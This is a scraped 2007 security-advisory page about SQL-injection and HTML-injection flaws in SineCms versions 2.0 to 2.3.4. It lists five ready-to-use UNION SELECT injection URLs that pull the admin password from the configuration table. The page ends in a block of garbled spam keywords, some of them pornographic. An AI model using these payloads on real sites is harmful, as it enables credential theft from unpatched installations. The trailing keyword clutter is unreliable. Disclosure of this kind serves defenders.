about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , SineCms Multiple Input Validation Vulnerabilities


Title SineCms Multiple Input Validation Vulnerabilities
Published 2007-12-05-12:00AM
Updated 2007-12-19-02:51PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  KiNgOfThEwOrLd is credited with the discovery of these vulnerabilities.
Vulnerable  SineCms SineCms 2.3.4
SineCms SineCms 2.3.2
SineCms SineCms 2.2.1
SineCms SineCms 2.1.1
SineCms SineCms 2.2
SineCms SineCms 2.1
SineCms SineCms 2.0
Not Vulnerable  SineCms Calendar Module 2.2.3
Code  An attacker can exploit these issues via a browser.The following SQL-injection examples were provided:http://www.example.com/[sinecms_path]/mods.php?mods=Calendar&action=info&id='+union+select+1,password,3,4,5,6,7,8,9+from+sine_configuration/*http://www.example.com/[sinecms_path]/admin/mods_adm.php?mods=Guestbook&action=modifica&id='+union+select+1,2,3,4,password,6+from+sine_configuration/*http://www.example.com/[sinecms_path]/admin/mods_adm.php?mods=Calendar&mese=11'+union+select+1,password,3,4,5,6,7,8,9+from+sine_configuration/*http://www.example.com/[sinecms_path]/admin/mods_adm.php?mods=Calendar&action=modify&id='+union+select+1,2,3,4,password,6,7,8,9+from+sine_configuration/*http://www.example.com/[sinecms_path]/admin/mods_adm.php?mods=Calendar&anno='+union+select+1,password,3,4,5,6,7,8,9+from+sine_configuration/*The attacker can exploit the HTML-injection vulnerabilities by submitting arbitrary HTML and script code.
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 10:19:26 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
krazy you tobe a visao do sexbangla. free sex g mvts www.sexyph huge ass BLUE film. zbanr.cn 200 /compo ALT www saxy u Www.free s 0023 00 33 mod_userdi maxcpm.inf xxx video 200 /compo guest+book faingc shelpasety Idol votin free sex v fake nude b o o b s free sex v www.ljyoyo ANI www.fzlmei Kernel ccb news for c sexgir boy mamta +www98.com bbs.xinshi apache 0.6 les bronz? Sivaji pho bbs.mk169. www.mk169. news for c Www trisha SOAP www.action ladies wit Pornobilde you tob vCard